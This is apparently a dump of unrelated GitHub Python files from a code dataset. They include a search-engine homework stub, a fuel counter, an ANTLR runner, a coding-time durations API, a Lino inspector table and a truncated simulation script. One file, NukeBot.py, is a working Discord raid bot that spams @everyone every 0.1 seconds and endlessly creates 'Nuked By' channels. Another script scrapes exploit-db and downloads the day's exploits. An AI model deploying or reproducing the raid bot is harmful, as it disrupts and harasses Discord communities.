True\n","repo_name":"CSCfi/metadata-submitter","sub_path":"metadata_backend/api/handlers/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":14430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72603696809","text":"#!/usr/bin/python3\nimport re\nimport nltk\nimport sys\nimport getopt\n\ndef usage():\n print(\"usage: \" + sys.argv[0] + \" -d dictionary-file -p postings-file -q file-of-queries -o output-file-of-results\")\n\ndef run_search(dict_file, postings_file, queries_file, results_file):\n \"\"\"\n using the given dictionary file and postings file,\n perform searching on the given queries file and output the results to a file\n \"\"\"\n print('running search on the queries...')\n # This is an empty method\n # Pls implement your code in below\n\ndictionary_file = postings_file = file_of_queries = output_file_of_results = None\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], 'd:p:q:o:')\nexcept getopt.GetoptError:\n usage()\n sys.exit(2)\n\nfor o, a in opts:\n if o == '-d':\n dictionary_file = a\n elif o == '-p':\n postings_file = a\n elif o == '-q':\n file_of_queries = a\n elif o == '-o':\n file_of_output = a\n else:\n assert False, \"unhandled option\"\n\nif dictionary_file == None or postings_file == None or file_of_queries == None or file_of_output == None :\n usage()\n sys.exit(2)\n\nrun_search(dictionary_file, postings_file, file_of_queries, file_of_output)\n","repo_name":"danxuZhang/NUS-CS3245","sub_path":"HW2/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16680973768","text":"alcool = 0\r\ngasolina = 0\r\ndisel = 0\r\nj = 0\r\nwhile j == 0:\r\n n = int(input(\"\"))\r\n if n == 1:\r\n alcool += 1\r\n elif n == 2:\r\n gasolina += 1\r\n elif n == 3:\r\n disel += 1\r\n elif n == 4:\r\n j = 1\r\nprint(\"MUITO OBRIGADO\")\r\nprint(f\"Alcool: {alcool}\")\r\nprint(f\"Gasolina: {gasolina}\")\r\nprint(f\"Diesel: {disel}\")","repo_name":"Gustavll/uri-python","sub_path":"uri1134.py","file_name":"uri1134.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39520765736","text":"# Commands\n#1 .ping\n#2 .create\n\n# Reminder python is case sensitive don't do .Create or .Ping \n\nimport discord\nfrom discord.ext import commands\nimport asyncio\n\nbot = 
commands.Bot(command_prefix='.')\nBOT_TOKEN = 'TOKEN_HERE'\n\n# Label: Send message every X seconds\nasync def send_everyone_message(ctx):\n while True:\n await ctx.send(\"@everyone\")\n print(\"Successfully sent @everyone message!\")\n await asyncio.sleep(0.1) # Adjust The Time to your wanted Time\n\n# Label: Create new text channel every hour\nasync def create_new_channel(guild):\n while True:\n new_channel = await guild.create_text_channel(name='Nuked By Kenniel') #Change Name on (name= 'Change_HERE')\n print(f\"Created new channel: {new_channel.name}\")\n await new_channel.send(\"@everyone DISCORD_SERVER\") # Send message to the new created channel = Nuking...\n await asyncio.sleep(0.1) # Wait for an hour\n\n@bot.command()\nasync def ping(ctx):\n await send_everyone_message(ctx)\n\n@bot.command()\nasync def create(ctx):\n await create_new_channel(ctx.guild)\n\n@bot.event\nasync def on_ready():\n print(f\"Logged in as {bot.user.name}\")\n\nbot.run(BOT_TOKEN)\n\n","repo_name":"Kenniel123/Kenniel-NukeBot","sub_path":"NukeBot.py","file_name":"NukeBot.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13371356545","text":"import sys\nfrom antlr4 import *\nfrom compiladoresLexer import compiladoresLexer\nfrom compiladoresParser import compiladoresParser\nfrom MyListener import MyListener\n\ndef main(argv):\n archivo = \"input/entrada.txt\"\n if len(argv) > 1 :\n archivo = argv[1]\n input = FileStream(archivo)\n lexer = compiladoresLexer(input)\n stream = CommonTokenStream(lexer)\n parser = compiladoresParser(stream)\n miListener = MyListener()\n parser.addParseListener(miListener)\n tree = parser.programa()\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"NachoMendezSP/compiladores","sub_path":"src/main/python/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6598393782","text":"class Food:\r\n def __init__(self, name, initial_quality):\r\n self.name = name\r\n self.initial_quality = initial_quality\r\n self.current_quality = initial_quality\r\n\r\n def check_freshness(self):\r\n \"\"\"\r\n Let's assume that this function can somehow access sensor data and\r\n updates the current quality of the food item.\r\n \"\"\"\r\n sensor_data = self.get_sensor_data()\r\n self.current_quality = self.process_sensor_data(sensor_data)\r\n\r\n if self.current_quality < 0.5 * self.initial_quality:\r\n return False\r\n else:\r\n return True\r\n\r\n def get_sensor_data(self):\r\n \"\"\"\r\n This is a placeholder for function that would collect data from a sensor.\r\n \"\"\"\r\n # Since we don't have actual sensors, we'll simulate a quality decrease by returning a random number\r\n import random\r\n return random.uniform(0, 1)\r\n\r\n def process_sensor_data(self, sensor_data):\r\n \"\"\"\r\n This is a placeholder for function that would process the sensor data.\r\n \"\"\"\r\n # For this example, let's just return the sensor data\r\n return sensor_data\r\n\r\n# Example usage:\r\n\r\nbanana = Food(\"Banana\", initial_quality=1.0)\r\n\r\nif banana.check_freshness():\r\n print(f\"The {banana.name} is fresh.\")\r\nelse:\r\n print(f\"The {banana.name} is not 
fresh.\")\r\n","repo_name":"roomaustin/Food-Test","sub_path":"Food-Test-Hypothetical.py","file_name":"Food-Test-Hypothetical.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28636503985","text":"import os\nimport sys\nimport numpy as np\nfrom pdb import set_trace\nimport module as mod\nimport parameter as para\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nimport pickle\n\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n\ndef ini_shape():\n\n\tif (para.Restart==1):\n\t\tdata \t\t\t= pickle.load( open( para.Resname, \"rb\" ) )\n\n\t\tmod.t \t\t\t= data['time']\t\t\t\n\t\tmod.zg \t\t\t= data['z']\t\t\n\t\tmod.z0 \t\t\t= data['z0']\t\t\t\n\t\tmod.gamma\t\t= data['gamma']\t\n\n\t\tmod.dataj\t\t= para.Res_i\n\t\tmod.plotj\t\t= para.Res_i\n\t\tmod.Ng \t\t\t= len(mod.zg)\n\telse:\t\n\t\talpha \t=\tpara.alpha\n\t\tR \t\t=\tpara.R\n\t\tn \t\t=\tpara.n\n\n\t\t# xn \t\t=\t(-0.052548103890057304-0.004128940307543485j)\n\t\t# xn2 \t=\t(0.017920232977232567+0.002658398993006049j)\n\t\t# xn3 \t=\t(-0.008535189439188302-0.0016199392387838797j)\n\t\t# xn4 \t=\t(0.004667277501091407+0.0009935965353182817j)\n\t\t# xn5 \t=\t(-0.002735911613585555-0.0006034506962295917j)\n\n\t\txn \t\t\t\t=\t1./500\n\t\txn2,xn3,xn4,xn5 =\t0,0,0,0\n\n\t\tx0 \t\t=\t-(np.abs(xn)**2+np.abs(xn2)**2+np.abs(xn3)**2+np.abs(xn4)**2+np.abs(xn5)**2)/R\n\t\t\t\n\t\txi\t\t=\tx0+ xn*np.exp(1j*n*alpha)+np.conj(xn)*np.exp(-1j*n*alpha)\\\n\t\t\t\t\t+xn2*np.exp(1j*n*2*alpha)+np.conj(xn2)*np.exp(-1j*n*2*alpha)\\\n\t\t\t\t\t+xn3*np.exp(1j*n*3*alpha)+np.conj(xn3)*np.exp(-1j*n*3*alpha)\\\n\t\t\t\t\t+xn4*np.exp(1j*n*4*alpha)+np.conj(xn4)*np.exp(-1j*n*4*alpha)\\\n\t\t\t\t\t+xn5*np.exp(1j*n*5*alpha)+np.conj(xn5)*np.exp(-1j*n*5*alpha)\n\t\n\t\tRR \t\t=\tR+xi\n\t\tmod.z0 \t=\tRR*np.cos(alpha)+1j*RR*np.sin(alpha)\n\t\tmod.zg \t=\tmod.z0*1.0\n\n\t\t#initialize gamma\n\t\tgamma_0 = 0.1\n\t\tmod.gamma = gamma_0*np.ones(para.Ng)\n\n\n\tif (rank==0):\n\t\tprint(' ')\n\t\tprint('--->','PURTURBATION INITIALIZATION FINISHED!')\n\n\treturn mod.extent_in\n\n\ndef ini_mpi(size,rank):\t\n\n\tmod.Nl \t\t\t= int(para.Ng/size)\t\n\tmod.extent \t\t= get_MPI_extent(para.Ng,rank,size)\n\tmod.extent_in \t= get_MPI_extent_int(para.Ng,rank,size)\n\n\tif (rank==0):\n\t\tprint(' ')\n\t\tprint('--->','MPI INITIALIZATION FINISHED!')\n\n\treturn mod.extent_in\n\ndef get_MPI_extent(Nglobal, myrank, totalsize ):\n\n\tNl = int(Nglobal/totalsize)\n\tngost=para.nghost\n\tG_list=np.arange(0, Nglobal, dtype=int)\n\n\n\tif (totalsize==1):\n\t\textent = np.concatenate([G_list[-ngost:],G_list,G_list[:ngost]])\n\n\telse:\t\n\t\tif myrank == 0:\n\t\t\textent = np.concatenate([G_list[-ngost:],G_list[:Nl*(myrank+1)+ngost]])\n\n\t\telif myrank == (totalsize-1):\n\t\t\textent = np.concatenate([G_list[Nl*myrank-ngost:],G_list[:ngost]])\n\n\t\telse:\n\t\t\textent = G_list[Nl*(myrank)-ngost:Nl*(myrank+1)+ngost]\n\n\treturn extent\n\ndef get_MPI_extent_int(Nglobal, myrank, totalsize ):\n\n\n\n\tNl = int(Nglobal/totalsize)\n\tngost=para.nghost_in\n\tG_list=np.arange(0, Nglobal, dtype=int)\n\n\tif (totalsize==1):\n\t\textent = np.concatenate([G_list[-ngost:],G_list,G_list[:ngost]])\n\n\telse:\n\t\tif myrank == 0:\n\t\t\textent = np.concatenate([G_list[-ngost:],G_list[:Nl*(myrank+1)+ngost]])\n\n\t\telif myrank == (totalsize-1):\n\t\t\textent = np.concatenate([G_list[Nl*myrank-ngost:],G_list[:ngost]])\n\n\t\telse:\n\t\t\textent = G_list[Nl*(myrank)-ngost:Nl*(myrank+1)+ngost]\n\n\treturn 
extent\t\n\n\n","repo_name":"zongxin/Ferroflui_Droplet_MPI","sub_path":"source/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74753855207","text":"import pprint\nimport pickle\nimport sys\n\ndef main():\n \n inFile = sys.argv[1]\n\n with open(inFile, 'rb') as cached_pcd_file:\n cache_data = pickle.load(cached_pcd_file)\n pprint.pprint(cache_data)\n return\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"danneengelson/urbanroadsweeper","sub_path":"print_dictionary.py","file_name":"print_dictionary.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28644654577","text":"# durations part of the wakatime api\n# https://wakatime.com/developers#durations\n\nimport uuid\nimport logging\nimport datetime\nfrom typing import List, Dict, Any, Tuple\n\nimport pytz\nfrom quart import Blueprint, request, jsonify, current_app as app\n\nfrom rana.auth import token_check\nfrom rana.utils import jsonify\nfrom rana.models import validate, DURATIONS_IN\nfrom rana.database import timestamp_\n\nlog = logging.getLogger(__name__)\nbp = Blueprint(\"durations\", __name__)\n\n\ndef _isofy(posix_tstamp: int) -> str:\n \"\"\"Return an ISO timestamp out of a POSIX integer timestamp.\"\"\"\n return datetime.datetime.fromtimestamp(posix_tstamp).isoformat()\n\n\ndef posix_dt_user(posix_tstamp: float, user_tz) -> datetime.datetime:\n \"\"\"From a posix timestamp (without timezone), convert it to a\n datetime object that is in view with the given user_tz.\"\"\"\n dt = datetime.datetime.fromtimestamp(posix_tstamp)\n return dt.astimezone(user_tz)\n\n\ndef convert_tz(dtime: datetime.datetime, old_tz: datetime.timezone, new_tz: str):\n \"\"\"Convert a non-timezone-aware datetime object (assumed to be on the\n given old_tz) into a new timezone.\n\n Given the current user's timezone.\n \"\"\"\n aware_dtime = datetime.datetime(\n dtime.year,\n dtime.month,\n dtime.day,\n dtime.hour,\n dtime.minute,\n dtime.second,\n tzinfo=old_tz,\n )\n\n new_as_tz = pytz.timezone(new_tz)\n return aware_dtime.astimezone(new_as_tz)\n\n\ndef _dur(row, do_user=False):\n \"\"\"Duration object from row.\"\"\"\n duration = {\"language\": row[1], \"project\": row[2], \"start\": row[3], \"end\": row[4]}\n\n if do_user:\n duration[\"user_id\"] = row[0]\n\n return duration\n\n\ndef durations_from_rows(rows, *, do_user=False) -> List[Dict[str, Any]]:\n \"\"\"Make a list of durations out of a list of heartbeats.\"\"\"\n durations_lst: List[Dict[str, Any]] = []\n\n for row in rows:\n # try to fetch the current latest duration in the list\n # and if its duration's end equals to the row's start, we\n # merge the row's end to the duration's end.\n try:\n lat_duration = durations_lst[len(durations_lst) - 1]\n\n # only update the latest duration if:\n # - the incoming row matches in project name, and\n # - if the incoming row is at MOST 10 minutes separated\n # from the latest duration\n is_same_project = row[2] == lat_duration[\"project\"]\n is_mergeable = (row[3] - lat_duration[\"end\"]) < 600\n\n if is_same_project and is_mergeable:\n lat_duration[\"end\"] = row[4]\n else:\n durations_lst.append(_dur(row, do_user))\n except IndexError:\n durations_lst.append(_dur(row, do_user))\n\n return durations_lst\n\n\nasync def calc_durations(\n user_id: uuid.UUID, spans: Tuple[int, int], *, more_raw=False\n) 
-> list:\n \"\"\"Iteratively calculate the durations of a given user based\n on the heartbeats.\"\"\"\n log.debug(\n \"calculating durations for uid %r, span0 %r, span1 %r\",\n user_id,\n spans[0],\n spans[1],\n )\n\n # spans.0 and spans.1 are in utc, as posix timestamps.\n # for all purposes, we want to convert from utc back to\n # the user's local timestamp\n rows = await app.db.fetch(\n f\"\"\"\n SELECT s.user_id, s.language, s.project, s.started_at, s.ended_at\n FROM (\n SELECT user_id, language, project, time AS started_at,\n (LAG(time) OVER (ORDER BY time DESC)) AS ended_at\n FROM heartbeats\n WHERE user_id = $1 and time > $2 and time < $3 and is_write = true\n GROUP BY user_id, language, project, time\n ORDER BY started_at) AS s\n WHERE s.ended_at - s.started_at < 600\n \"\"\",\n user_id,\n spans[0],\n spans[1],\n )\n\n durations_lst = durations_from_rows(rows)\n user_tz = await app.db.fetch_user_tz(user_id)\n\n def _convert_duration(dur):\n # converting from UTC to user tz.\n # pytz already assumes the timezone is UTC when the\n # datetime object isn't timezone aware, which is good.\n start = posix_dt_user(dur[\"start\"], user_tz)\n end = posix_dt_user(dur[\"end\"], user_tz)\n\n if more_raw:\n return {\n \"project\": dur[\"project\"] or \"Other\",\n \"language\": dur[\"language\"] or \"Other\",\n \"start\": start,\n \"end\": end,\n }\n\n return {\n \"project\": dur[\"project\"] or \"Other\",\n \"language\": dur[\"language\"] or \"Other\",\n \"start\": start.isoformat(),\n \"end\": end.isoformat(),\n }\n\n return list(map(_convert_duration, durations_lst))\n\n\nasync def durations(user_id: uuid.UUID, args: dict):\n \"\"\"Calculate user's durations for a given day (in args.date).\n\n Returns the JSON response for the API.\n \"\"\"\n # args['date'] is in the user's current timezone.\n # we must convert it first to UTC, and from there,\n # make our calc_durations query.\n spans = args[\"date\"].spans_as_dt\n\n user_tz = await app.db.fetch_user_tz(user_id)\n start = convert_tz(spans[0], user_tz, \"UTC\")\n end = convert_tz(spans[1], user_tz, \"UTC\")\n\n # since start and end now point to UTC, we can convert\n # them to timestamps for the DB query.\n durations_lst = await calc_durations(user_id, (start.timestamp(), end.timestamp()))\n\n return jsonify(\n durations_lst,\n extra={\n \"branches\": [\"master\"],\n \"start\": start.isoformat(),\n \"end\": end.isoformat(),\n },\n )\n\n\n@bp.route(\"/current/durations\")\nasync def current_user_durations():\n user_id = await token_check()\n args = validate(dict(request.args), DURATIONS_IN)\n return await durations(user_id, args)\n","repo_name":"lun-4/rana","sub_path":"rana/blueprints/durations.py","file_name":"durations.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"73722664167","text":"import re\nfrom html import escape\nimport types\nimport datetime\n\nfrom etgen.html import E\n\nfrom django.db import models\nfrom django.conf import settings\n\nfrom lino.utils.report import EmptyTable\nfrom lino.utils import AttrDict\nfrom lino.core.utils import get_models\nfrom lino.utils.code import codefiles, SourceFile\nfrom lino.utils import join_elems\nfrom lino.api import rt, dd, _\n\n# from .mixins import Searchable\nfrom .roles import SiteSearcher\nfrom .choicelists import TimeZones\n\nclass Models(dd.VirtualTable):\n label = _(\"Models\")\n # column_defaults = dict(width=8)\n # column_names = \"app name verbose_name docstring rows\"\n 
column_names = \"app name fields #docstring tables rows detail_action_column\"\n detail_layout = \"\"\"\n app name docstring rows\n about.FieldsByModel\n \"\"\"\n\n display_mode = 'html'\n\n @classmethod\n def get_data_rows(self, ar):\n # user_type = ar.get_user().user_type\n for model in get_models():\n if True:\n # print model\n yield model\n\n @classmethod\n def summary_row(cls, ar, obj, **kw):\n return [str(obj._meta.verbose_name_plural)]\n\n @dd.displayfield(_(\"app_label\"))\n def app(self, obj, ar):\n return obj._meta.app_label\n\n @dd.displayfield(_(\"name\"))\n def name(self, obj, ar):\n return obj.__name__\n\n @dd.displayfield(_(\"Detail Action\"))\n def detail_action_column(self, obj, ar):\n if obj.get_default_table().detail_action is None:\n return ''\n return obj.get_default_table().detail_action.full_name()\n\n @dd.displayfield(_(\"Tables\"))\n def tables(self, obj, ar):\n # tables = obj._lino_slaves.values()\n def fmt(tbl):\n url = tbl.__module__ + '.' + tbl.__name__\n return E.a(tbl.__name__, href=url)\n return join_elems([fmt(tbl) for tbl in obj._lino_tables])\n # return obj.get_default_table().detail_action.full_name()\n\n # @dd.displayfield(_(\"verbose name\"))\n # def vebose_name(self,obj,ar):\n # return unicode(obj._meta.vebose_name)\n\n @dd.displayfield(_(\"docstring\"))\n def docstring(self, obj, ar):\n return obj.__doc__\n # return restify(unicode(obj.__doc__))\n\n @dd.requestfield(_(\"Rows\"))\n def rows(self, obj, ar):\n return obj.get_default_table().request(\n user=ar.get_user(), renderer=ar.renderer)\n\n @dd.displayfield(_(\"Fields\"))\n def fields(self, obj, ar):\n return ' '.join([f.name for f in obj._meta.get_fields()])\n\n\nclass FieldsByModel(dd.VirtualTable):\n label = _(\"Fields\")\n # master_key = \"model\"\n # master = Models\n column_names = \"name verbose_name help_text_column\"\n\n @classmethod\n def get_data_rows(self, ar):\n model = ar.master_instance\n if model:\n for (fld, remote) in model._meta.get_fields_with_model():\n yield fld\n\n @dd.displayfield(_(\"name\"))\n def name(self, fld, ar):\n return fld.name\n\n @dd.displayfield(_(\"verbose name\"))\n def verbose_name(self, fld, ar):\n return str(fld.verbose_name)\n\n @dd.displayfield(_(\"help text\"))\n def help_text_column(self, obj, ar):\n # return obj.__doc__\n return restify(str(obj.help_text))\n\n\nclass Inspected(object):\n\n def __init__(self, parent, prefix, name, value):\n self.parent = parent\n self.prefix = prefix\n self.name = name\n self.value = value\n\n\nclass Inspector(dd.VirtualTable):\n \"\"\"\n Shows a simplistic \"inspector\" which once helped me for debugging.\n Needs more work to become seriously useful...\n\n \"\"\"\n label = _(\"Inspector\")\n required_roles = dd.login_required(dd.SiteStaff)\n column_names = \"i_name i_type i_value\"\n parameters = dict(\n inspected=models.CharField(\n _(\"Inspected object\"), max_length=100, blank=True),\n show_callables=models.BooleanField(_(\"show callables\"), default=False)\n )\n params_layout = 'inspected show_callables'\n # editable = False\n # display_mode = 'html'\n\n @classmethod\n def get_inspected(self, name):\n # ctx = dict(settings=settings,lino=lino)\n if not name:\n return settings\n try:\n o = eval('settings.' 
+ name)\n except Exception as e:\n o = e\n return o\n\n\n @classmethod\n def get_data_rows(self, ar):\n # dd.logger.info(\"20120210 %s, %s\",ar.quick_search,ar.param_values.inspected)\n\n if ar.param_values.show_callables:\n def flt(v):\n return True\n else:\n def flt(v):\n if isinstance(v, (\n types.FunctionType,\n types.GeneratorType,\n types.MethodType,\n types.BuiltinMethodType,\n types.BuiltinFunctionType\n )):\n return False\n return True\n\n o = self.get_inspected(ar.param_values.inspected)\n # print(20170207, o)\n\n if isinstance(o, (list, tuple)):\n for i, v in enumerate(o):\n k = \"[\" + str(i) + \"]\"\n yield Inspected(o, '', k, v)\n elif isinstance(o, AttrDict):\n for k, v in list(o.items()):\n yield Inspected(o, '.', k, v)\n elif isinstance(o, dict):\n for k, v in list(o.items()):\n k = \"[\" + repr(k) + \"]\"\n yield Inspected(o, '', k, v)\n elif isinstance(o, type) and issubclass(o, models.Model):\n for fld in o._meta.get_fields():\n k = \"._meta.get_field('\" + fld.name + \"')\"\n yield Inspected(o, '', fld.name, fld)\n else:\n for k in dir(o):\n if not k.startswith('__'):\n if not ar.quick_search or (\n ar.quick_search.lower() in k.lower()):\n v = getattr(o, k)\n if flt(v):\n # if not inspect.isbuiltin(v) and not inspect.ismethod(v):\n # if ar.param_values.show_callables or not inspect.isfunction(v):\n # if isinstance(v,types.FunctionType ar.param_values.show_callables or not callable(v):\n yield Inspected(o, '.', k, v)\n # for k,v in o.__dict__.items():\n # yield Inspected(o,k,v)\n\n @dd.displayfield(_(\"Name\"))\n def i_name(self, obj, ar):\n pv = dict()\n if ar.param_values.inspected:\n pv.update(inspected=ar.param_values.inspected +\n obj.prefix + obj.name)\n else:\n pv.update(inspected=obj.name)\n # newreq = ar.spawn(ar.ui,user=ar.user,renderer=ar.renderer,param_values=pv)\n # newreq = ar.spawn_request(param_values=pv)\n # return ar.href_to_request(newreq, obj.name)\n return obj.name\n\n @dd.displayfield(_(\"Value\"))\n def i_value(self, obj, ar):\n return escape(str(obj.value), quote=False)\n\n @dd.displayfield(_(\"Type\"))\n def i_type(self, obj, ar):\n return escape(str(type(obj.value)), quote=False)\n\n\nclass SourceFiles(dd.VirtualTable):\n label = _(\"Source files\")\n column_names = 'module_name code_lines doc_lines'\n\n @classmethod\n def get_data_rows(self, ar):\n for name, filename in codefiles('lino*'):\n yield SourceFile(name, filename)\n\n @dd.virtualfield(models.IntegerField(_(\"Code\")))\n def code_lines(self, obj, ar):\n return obj.count_code\n\n @dd.virtualfield(models.IntegerField(_(\"doc\")))\n def doc_lines(self, obj, ar):\n return obj.count_doc\n\n @dd.virtualfield(models.CharField(_(\"module name\")))\n def module_name(self, obj, ar):\n return obj.modulename\n","repo_name":"lino-framework/xl","sub_path":"lino_xl/lib/inspect/desktop.py","file_name":"desktop.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"21607584986","text":"# -*- coding: utf-8 -*-\n# @Author: bunny\n# @Date: 2016-03-23 13:37:10\n# @Last Modified by: bunny\n# @Last Modified time: 2016-03-29 12:13:28\nimport urllib2\nimport re\nfrom BeautifulSoup import BeautifulSoup\nimport datetime\n\ndef seebug():\n all = []\n userMainUrl = \"https://www.exploit-db.com/webapps/\"\n req = urllib2.Request(userMainUrl)\n resp = urllib2.urlopen(req)\n respHtml = resp.read()\n songtasteHtmlEncoding = \"UTF-8\"\n soup = 
BeautifulSoup(respHtml,fromEncoding=songtasteHtmlEncoding).tbody\n for soup1 in soup.contents:\n if not soup1 == '\\n':\n vulnsdate = soup1.find(attrs={\"class\":\"date\"})\n dlink1 = soup1.find(attrs={\"class\":\"dlink\"})\n app1 = soup1.find(attrs={\"class\":\"app\"})\n description1 = soup1.find(attrs={\"class\":\"description\"})\n if(vulnsdate):\n date1 = vulnsdate.string.replace('\\t','').replace('\\n','').replace(' ','')\n date2 = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n if date1 == date2:\n description = description1.a.string.replace('/','')\n dlink = dlink1.a['href']\n app = \"https://www.exploit-db.com\" + str(app1.a['href'])\n all.append((description,dlink,app)) \n return all\n \ndef main():\n all = seebug()\n for description,dlink,app in all:\n file = urllib2.urlopen(dlink)\n data = file.read()\n with open(\"/Users/bunny/Dropbox/seebug/\" + description + \".txt\", \"wb\") as code: \n code.write(data)\n file1 = urllib2.urlopen(app)\n data1 = file1.read()\n with open(\"/Users/bunny/Dropbox/app/\" + description + \".zip\", \"wb\") as code:\n code.write(data1)\n\nif __name__ == '__main__':\n main()\n","repo_name":"LubyRuffy/my_script_tool","sub_path":"seebug.py","file_name":"seebug.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72435157289","text":"import os\n\nimport pandas as pd\n\n\ndef excel_find_row(date, path):\n dates = date.split('.')\n month = dates[1]\n day = dates[2]\n demo_df = pd.read_excel(f'{path}/(周莹莹)聚英-2022年银行日记账2022.5.10.xlsx')\n for indexs in demo_df.index:\n for i in range(len(demo_df.loc[indexs].values)):\n if (str(demo_df.loc[indexs].values[i]) == month and str(demo_df.loc[indexs].values[i + 1]) == day):\n row = (int)(str(indexs - 1).rstrip('L'))\n return row\n\n\ndef excel_print(excelAdd, row_num):\n result = pd.read_excel(excelAdd)\n name = result.columns[0]\n print(name)\n result = pd.read_excel(excelAdd, header=1)\n data = result.iloc[row_num:row_num + 1]\n print(data[0:8])\n print()\n\n\ndef excel_print2(excelAdd, row_num):\n result = pd.read_excel(excelAdd)\n name = result.columns[0]\n result = pd.read_excel(excelAdd, header=1)\n data = result.iloc[row_num:row_num + 1]\n # print(result.columns[0:6])\n sum = {'name': name,\n 'data': data}\n return sum\n\n\ndef excel_new(date):\n nan_excel = pd.DataFrame()\n new_name = f'银行余额表汇总{date}'\n # nan_excel.to_excel(new_name)\n # writer = pd.ExcelWriter(f'银行余额表{date}')\n # writer.save()\n # writer.close()\n\n\ndef excel_dos(find_date, excelname_date, path):\n file_list = os.listdir(path)\n file_list.sort()\n fileNum = len(file_list)\n row_num = excel_find_row(find_date, path)\n print(\"There are %d xlsx files in this directory; only files containing the bookkeeping date are merged\" % fileNum)\n\n for file in file_list:\n if '~$' not in file and excelname_date in file: # open temp files and files without the date in their name are skipped\n excelAdd = os.path.join(path, file)\n else:\n continue\n excel_print(excelAdd, row_num)\n\n\nif __name__ == '__main__':\n find_date = '2022.5.6' # the date to calculate\n excelname_date = '2022.5.10' # the date in the excel file name\n # find_date = excelname_date\n path = 'linlin/银行余额自动更新测试/'\n excel_dos(find_date, excelname_date, path)\n","repo_name":"zhaotong2027/test-excel-conformity","sub_path":"linlin/ExcelRead.py","file_name":"ExcelRead.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"21949572862","text":"import logging\nfrom contracts.enums import Response, ProxyType, Provider\nfrom contracts.proxy 
import Proxy\n\n\nclass ProxyHelper:\n\n @staticmethod\n def create_and_log_proxy_stats(proxies, task_results, provider_id):\n proxy_records = set()\n http_c = http_ssl_c = socks4_c = socks5_c = 0\n\n for t in task_results:\n\n if t.result_type is Response.SUCCESS:\n if t.type_id is ProxyType.HTTP.value:\n if t.ssl is False:\n http_c += 1\n else:\n http_ssl_c += 1\n elif t.type_id is ProxyType.SOCKS4.value:\n socks4_c += 1\n elif t.type_id is ProxyType.SOCKS5.value:\n socks5_c += 1\n\n proxy_records.add(Proxy(address=t.address, port=t.port, country_code=t.country_code,\n provider_id=provider_id,\n access_type_id=t.access_type_id, type_id=t.type_id, speed=t.speed,\n uptime=t.uptime))\n\n logging.info(f'Successful: {len(proxy_records)}/{len(task_results)}\\n'\n f'HTTP => [{http_c}/{len(proxies[0])}]\\n'\n f'HTTP SSL => [{http_ssl_c}/{len(proxies[1])}]\\n'\n f'SOCKS4 => [{socks4_c}/{len(proxies[2])}]\\n'\n f'SOCKS5 => [{socks5_c}/{len(proxies[3])}]')\n\n return proxy_records\n","repo_name":"bokklu/proxy-scraper-checker","sub_path":"src/utils/proxy_helper.py","file_name":"proxy_helper.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36353323061","text":"__author__ = 'Abuenameh'\n\nimport sys\nimport numpy as np\nimport itertools\nimport concurrent.futures\nimport datetime\nimport threading\nimport os\nimport tempfile\nimport shutil\nimport subprocess\nimport time\nfrom mathematica import mathformat, timedeltaformat\nfrom switch import switch\nfrom subprocess import PIPE, Popen\n\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\nnumthreads = 15\n\nL = 50\nnmax = 7\n\nU = 1\n\nnsweeps = 5\nerrgoal = 1e-16\n\nmaxm = [20, 20, 100, 100, 200]\nminm = [20]\ncutoff = [1e-10]\nniter = [4, 3, 2]\nnoise = [1e-6, 1e-7, 1e-8, 0]\n\nmaxm += [maxm[-1]] * (nsweeps - len(maxm))\nminm += [minm[-1]] * (nsweeps - len(minm))\ncutoff += [cutoff[-1]] * (nsweeps - len(cutoff))\nniter += [niter[-1]] * (nsweeps - len(niter))\nnoise += [noise[-1]] * (nsweeps - len(noise))\n\nmaxm = [str(i) for i in maxm]\nminm = [str(i) for i in minm]\ncutoff = [str(i) for i in cutoff]\nniter = [str(i) for i in niter]\nnoise = [str(i) for i in noise]\n\nquiet = 'yes'\n\nseed = 100\nneigen = 1\n\nif len(sys.argv) < 4:\n print('Insufficient number of command line arguments.')\n quit(1)\n\ndelta = float(sys.argv[2])\n\nif delta > 0:\n np.random.seed(int(sys.argv[3]))\n mu = delta*2*np.random.random(L) - delta\n # mu = [0.0244067519637,0.107594683186,0.0513816880358,0.0224415914984,-0.0381726003305,0.0729470565333,-0.0312063943687,0.195886500391,0.231831380251,-0.0582792405871,0.145862519041,0.0144474598765]\n mustr = \",\".join([str(mui) for mui in mu])\nelse:\n mu = 0\n mustr = 